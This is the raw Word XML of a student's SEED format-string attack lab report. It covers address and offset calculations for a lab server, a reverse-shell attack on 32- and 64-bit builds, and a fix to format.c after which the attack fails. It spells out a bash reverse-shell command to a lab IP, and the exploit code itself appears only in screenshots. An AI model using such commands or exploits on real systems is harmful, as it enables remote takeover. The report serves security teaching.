      <w:bookmarkStart w:id="10" w:name="_Toc132474992"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 4</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="00906793" w:rsidP="00C4310E">
      <w:r>
        <w:t>Using the following script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00906793">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33D64543" wp14:editId="5282A94B">
            <wp:extent cx="5731510" cy="51517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3" w:rsidRDefault="00906793" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00906793">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DDB3AF2" wp14:editId="39030DD6">
            <wp:extent cx="5731510" cy="28994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3" w:rsidRDefault="00906793" w:rsidP="00906793">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now leading to the modification in it which includes the starting address added with buffer and length of 1500 shellcode bytes entered by the user.</w:t>
      </w:r>
      <w:r w:rsidRPr="00906793">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00906793" w:rsidRPr="00906793" w:rsidRDefault="00906793" w:rsidP="00906793">
      <w:r w:rsidRPr="00906793">
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> return address of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>myprintf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00906793">
        <w:t>0xffffd128+0x4=0xffffd12c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00906793">
      <w:r w:rsidRPr="00906793">
        <w:t>The starting address of the shellcode: 0xffffd200+1364=0xffffD754</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00906793">
      <w:r>
        <w:t xml:space="preserve">Calculations to be used are </w:t>
      </w:r>
      <w:r w:rsidRPr="00906793">
        <w:t>0xffff=65535=12+62*1056+51</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> where 0x1D754=120660</w:t>
      </w:r>
      <w:r w:rsidR="009F645D">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00906793">
        <w:t>0x1D754-0xffff=55125</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Where it is to be noted that </w:t>
      </w:r>
      <w:r w:rsidRPr="00906793">
        <w:t>0x1D754</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is smaller than </w:t>
      </w:r>
      <w:r w:rsidRPr="00906793">
        <w:t>0xffff</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FF1516">
        <w:t xml:space="preserve"> Which leads to the following modified code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00906793" w:rsidRPr="00906793" w:rsidRDefault="00DE29F3" w:rsidP="00906793">
      <w:r w:rsidRPr="00DE29F3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67C5BE7E" wp14:editId="3A420B56">
            <wp:extent cx="5731510" cy="305181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3" w:rsidRDefault="00252FDF" w:rsidP="00C4310E">
      <w:r>
        <w:t>Sending the script tot the server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00252FDF" w:rsidRDefault="00252FDF" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00252FDF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B57B35B" wp14:editId="2CD4F5EB">
            <wp:extent cx="5731510" cy="6477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6F" w:rsidRDefault="00C7136F" w:rsidP="00C4310E">
      <w:r>
        <w:t>This is the response on server side.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7136F" w:rsidRDefault="00C7136F" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00C7136F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C7714E0" wp14:editId="4B6A88AC">
            <wp:extent cx="5731510" cy="18624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6F" w:rsidRDefault="00C7136F" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00C7136F" w:rsidRDefault="00C7136F" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00C7136F" w:rsidRDefault="00C7136F" w:rsidP="00C4310E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>And the desired result of malicious code being executed has been achieved.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7136F" w:rsidRDefault="00C7136F" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00C7136F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60ADE349" wp14:editId="2ED45FFC">
            <wp:extent cx="5667154" cy="1488558"/>
            <wp:effectExtent l="19050" t="19050" r="1016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r="752" b="9396"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669104" cy="14890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CDA" w:rsidRDefault="00D01CDA" w:rsidP="00C4310E">
      <w:r>
        <w:t xml:space="preserve">Modifying the above code in 32 bit shellcode by placing the command to be executed as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/bin/bash-c*/bin/bash –I &gt; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/10.9.0.1/9090 0&lt;&amp;1 2&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidR="007A58C0">
        <w:t>. After modification sending the script to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A58C0" w:rsidRDefault="007A58C0" w:rsidP="00C4310E">
      <w:r w:rsidRPr="007A58C0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13C93CA1" wp14:editId="027D0A8B">
            <wp:extent cx="5731510" cy="4851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DE" w:rsidRDefault="009167DE" w:rsidP="00C4310E">
      <w:r>
        <w:t>Initiated listening process to get the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009167DE" w:rsidRDefault="009167DE" w:rsidP="00C4310E">
      <w:r w:rsidRPr="009167DE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45B784A4" wp14:editId="2C68677D">
            <wp:extent cx="5731510" cy="7499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C0" w:rsidRDefault="007A58C0" w:rsidP="00C4310E">
      <w:r>
        <w:t>Server displays the following result.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A58C0" w:rsidRDefault="007A58C0" w:rsidP="00C4310E">
      <w:r w:rsidRPr="007A58C0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B139F9B" wp14:editId="753F2357">
            <wp:extent cx="5731510" cy="9848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DE" w:rsidRDefault="009167DE" w:rsidP="00C4310E">
      <w:r>
        <w:t>Now coming back to the listener the connection is established and a reverse shell is achieved.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009167DE" w:rsidRDefault="009167DE" w:rsidP="00C4310E">
      <w:r w:rsidRPr="009167DE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BA0C45A" wp14:editId="7D1DBD94">
            <wp:extent cx="4248743" cy="178142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DE" w:rsidRDefault="009167DE" w:rsidP="00C4310E"/>
    <w:p w:rsidR="009167DE" w:rsidRPr="007A58C0" w:rsidRDefault="009167DE" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E" w:rsidP="00C4310E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc132474993"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="009167DE" w:rsidP="00C4310E">
      <w:r>
        <w:t>Testing the 64 bit server program.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009167DE" w:rsidRDefault="009167DE" w:rsidP="00C4310E">
      <w:r w:rsidRPr="009167DE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B09BDD8" wp14:editId="44B38ACF">
            <wp:extent cx="5731510" cy="3130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DE" w:rsidRDefault="009167DE" w:rsidP="00C4310E">
      <w:r>
        <w:t>Which has been successfully received</w:t>
      </w:r>
      <w:r w:rsidR="003402AE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009167DE" w:rsidRDefault="009167DE" w:rsidP="00C4310E">
      <w:r w:rsidRPr="009167DE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DC430DF" wp14:editId="6E23233F">
            <wp:extent cx="5731510" cy="33470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AE" w:rsidRDefault="003402AE" w:rsidP="00C4310E">
      <w:r>
        <w:t xml:space="preserve">Now with the same method as in Task 2A </w:t>
      </w:r>
      <w:r w:rsidR="00B80A60">
        <w:t>I found the starting position of the input.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B80A60" w:rsidRDefault="00B80A60" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00B80A60">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EA7720A" wp14:editId="57473D97">
            <wp:extent cx="5731510" cy="2166620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60" w:rsidRDefault="00482962" w:rsidP="00C4310E">
      <w:r>
        <w:t>Where this is the result point.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B80A60" w:rsidRDefault="00B80A60" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00B80A60">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CE4CD87" wp14:editId="324F9904">
            <wp:extent cx="5731510" cy="59563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5" w:rsidRDefault="002F3B55" w:rsidP="00C4310E"/>
    <w:p w:rsidR="002F3B55" w:rsidRDefault="002F3B55" w:rsidP="00C4310E"/>
    <w:p w:rsidR="002F3B55" w:rsidRDefault="002F3B55" w:rsidP="00C4310E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now modifying the exploit code</w:t>
      </w:r>
      <w:r w:rsidR="000B23BE">
        <w:t xml:space="preserve"> used in the previous task</w:t>
      </w:r>
      <w:r w:rsidR="0020519A">
        <w:t xml:space="preserve"> by also adding string parameters accordingly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to get the attack done.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F3B55" w:rsidRDefault="002F3B55" w:rsidP="00C4310E">
      <w:r w:rsidRPr="002F3B55">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2756BD1E" wp14:editId="6DAA0300">
            <wp:extent cx="5731510" cy="3750310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5" w:rsidRDefault="00026865" w:rsidP="00C4310E"/>
    <w:p w:rsidR="0013711C" w:rsidRDefault="00D853DF" w:rsidP="00C4310E">
      <w:r>
        <w:t>Starting the listener to get the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013711C" w:rsidRDefault="000C7151" w:rsidP="00C4310E">
      <w:r w:rsidRPr="000C7151">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22A0BA7A" wp14:editId="7D968119">
            <wp:extent cx="5731510" cy="44323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1C" w:rsidRDefault="0013711C" w:rsidP="00C4310E">
      <w:r>
        <w:t>Sending the script to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013711C" w:rsidRDefault="0013711C" w:rsidP="00C4310E">
      <w:r w:rsidRPr="0013711C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52E082F0" wp14:editId="616DE1E8">
            <wp:extent cx="5731510" cy="4965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51" w:rsidRDefault="000C7151" w:rsidP="00C4310E"/>
    <w:p w:rsidR="000C7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E"/>
    <w:p w:rsidR="000C7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E"/>
    <w:p w:rsidR="000C7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E"/>
    <w:p w:rsidR="000C7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E"/>
    <w:p w:rsidR="000C7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E"/>
    <w:p w:rsidR="000C7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E"/>
    <w:p w:rsidR="000C7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E"/>
    <w:p w:rsidR="000C7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E"/>
    <w:p w:rsidR="0013711C" w:rsidRDefault="0013711C" w:rsidP="00C4310E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Server side looks like this</w:t>
      </w:r>
      <w:r w:rsidR="000C7151">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E">
      <w:r w:rsidRPr="000C7151">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="429FB46E" wp14:editId="7D75A901">
            <wp:extent cx="5731510" cy="438721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78" w:rsidRDefault="001F0C78" w:rsidP="00C4310E">
      <w:r>
        <w:t>Coming back to the listener I got a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B7EE0" w:rsidRDefault="002B7EE0" w:rsidP="00C4310E">
      <w:r w:rsidRPr="002B7EE0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16C8F1FA" wp14:editId="6FEBEE97">
            <wp:extent cx="5731510" cy="1459865"/>
            <wp:effectExtent l="0" t="0" r="254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4C" w:rsidRDefault="00FE724C" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00FE724C" w:rsidRDefault="00FE724C" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00FE724C" w:rsidRDefault="00FE724C" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00FE724C" w:rsidRDefault="00FE724C" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00FE724C" w:rsidRDefault="00FE724C" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00FE724C" w:rsidRDefault="00FE724C" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00FE724C" w:rsidRDefault="00FE724C" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E" w:rsidP="00C4310E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc132474994"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 6</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="00FE724C" w:rsidRDefault="00FE724C" w:rsidP="00FE724C">
      <w:r>
        <w:t xml:space="preserve">To fix the issues I went to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE724C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>server-code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directory and modified the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE724C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>format.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE724C" w:rsidRDefault="00FE724C" w:rsidP="00FE724C">
      <w:r w:rsidRPr="00FE724C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05DD1EA4" wp14:editId="274EEBAD">
            <wp:extent cx="5731510" cy="528701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4C" w:rsidRDefault="00FE724C" w:rsidP="00FE724C">
      <w:r>
        <w:t>Compiling the code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE724C" w:rsidRDefault="00FE724C" w:rsidP="00FE724C">
      <w:r w:rsidRPr="00FE724C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7410D124" wp14:editId="1222A7C2">
            <wp:extent cx="5731510" cy="13589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1B" w:rsidRDefault="008A631B" w:rsidP="00FE724C"/>
    <w:p w:rsidR="008A631B" w:rsidRDefault="008A631B" w:rsidP="00FE724C"/>
    <w:p w:rsidR="008A631B" w:rsidRDefault="008A631B" w:rsidP="00FE724C"/>
    <w:p w:rsidR="008A631B" w:rsidRDefault="008A631B" w:rsidP="00FE724C"/>
    <w:p w:rsidR="008A631B" w:rsidRDefault="008A631B" w:rsidP="00FE724C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Starting the servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A631B" w:rsidRDefault="008A631B" w:rsidP="00FE724C">
      <w:r w:rsidRPr="008A631B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09F2856D" wp14:editId="5A709DDE">
            <wp:extent cx="5696745" cy="1105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1B" w:rsidRDefault="008A631B" w:rsidP="00FE724C">
      <w:r>
        <w:t>Now with the configurations done for 32 bit program reverse shell attack I launched the attack by sending the script to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A631B" w:rsidRDefault="008A631B" w:rsidP="00FE724C">
      <w:r w:rsidRPr="008A631B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1191AF89" wp14:editId="6FE19B32">
            <wp:extent cx="5731510" cy="526415"/>
            <wp:effectExtent l="0" t="0" r="254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72" w:rsidRDefault="00410B72" w:rsidP="00FE724C">
      <w:r>
        <w:t>And the attack failed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00410B72" w:rsidRPr="00FE724C" w:rsidRDefault="00410B72" w:rsidP="00FE724C">
      <w:r w:rsidRPr="00410B72">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EE4921E" wp14:editId="27615555">
            <wp:extent cx="5731510" cy="364109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B72" w:rsidRPr="00FE724C" w:rsidSect="00C431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C8"/>
    <w:rsid w:val="00026865"/>
    <w:rsid w:val="0005084B"/>
    <w:rsid w:val="000B23BE"/>
    <w:rsid w:val="000C7151"/>
    <w:rsid w:val="0013711C"/>
    <w:rsid w:val="001A6953"/>
    <w:rsid w:val="001C2008"/>
    <w:rsid w:val="001C453E"/>
    <w:rsid w:val="001D55BB"/>
    <w:rsid w:val="001F0C78"/>
    <w:rsid w:val="00202891"/>
    <w:rsid w:val="00204579"/>
    <w:rsid w:val="0020519A"/>
    <w:rsid w:val="00252FDF"/>
    <w:rsid w:val="002B7EE0"/>
    <w:rsid w:val="002F3B55"/>
    <w:rsid w:val="003402AE"/>
    <w:rsid w:val="00367B30"/>
    <w:rsid w:val="003A4886"/>
    <w:rsid w:val="003D171B"/>
    <w:rsid w:val="00410B72"/>
    <w:rsid w:val="00482962"/>
    <w:rsid w:val="005A63B5"/>
    <w:rsid w:val="006B292B"/>
    <w:rsid w:val="006D676C"/>
    <w:rsid w:val="007225C0"/>
    <w:rsid w:val="007A58C0"/>
    <w:rsid w:val="00844E40"/>
    <w:rsid w:val="00857DC8"/>
    <w:rsid w:val="0087148D"/>
    <w:rsid w:val="008A631B"/>
    <w:rsid w:val="008E609F"/>
    <w:rsid w:val="00906793"/>
    <w:rsid w:val="009167DE"/>
    <w:rsid w:val="009621AB"/>
    <w:rsid w:val="00997F33"/>
    <w:rsid w:val="009F645D"/>
    <w:rsid w:val="00B80A60"/>
    <w:rsid w:val="00BB4844"/>
    <w:rsid w:val="00BD6AA1"/>
    <w:rsid w:val="00C4310E"/>
    <w:rsid w:val="00C7136F"/>
    <w:rsid w:val="00D01CDA"/>
    <w:rsid w:val="00D853DF"/>
    <w:rsid w:val="00DA3BD6"/>
    <w:rsid w:val="00DA677C"/>
    <w:rsid w:val="00DE29F3"/>
    <w:rsid w:val="00E81F5F"/>
    <w:rsid w:val="00F36FE8"/>
    <w:rsid w:val="00F62C6C"/>
    <w:rsid w:val="00FA722A"/>
    <w:rsid w:val="00FC4383"/>
    <w:rsid w:val="00FE724C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3944D-ADD4-4936-9C20-276DA17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31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10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3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10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1F5F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29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9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C432F-F707-4147-A2FB-11CDEEA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String Attack Lab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tring Attack Lab</dc:title>
  <dc:subject>SEED 2.0</dc:subject>
  <dc:creator>Enter your name</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Touseef Hasnain</cp:lastModifiedBy>
  <cp:revision>50</cp:revision>
  <cp:lastPrinted>2023-04-15T23:24:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-15T02:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-15T23:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>